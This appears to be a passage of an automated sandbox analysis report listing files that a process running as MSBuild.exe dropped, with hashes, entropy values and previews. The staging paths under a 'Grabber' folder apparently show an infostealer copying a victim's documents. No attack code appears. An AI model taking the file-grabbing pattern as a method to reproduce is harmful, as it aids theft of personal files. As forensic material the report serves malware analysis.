Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN\MXPXCVPDVN.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\MXPXCVPDVN\QCFWYSKMHA.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\NEBFQQYWPS.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\QCFWYSKMHA.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\QNCYCDFIJJ.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Documents\SFPUSAFIOL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
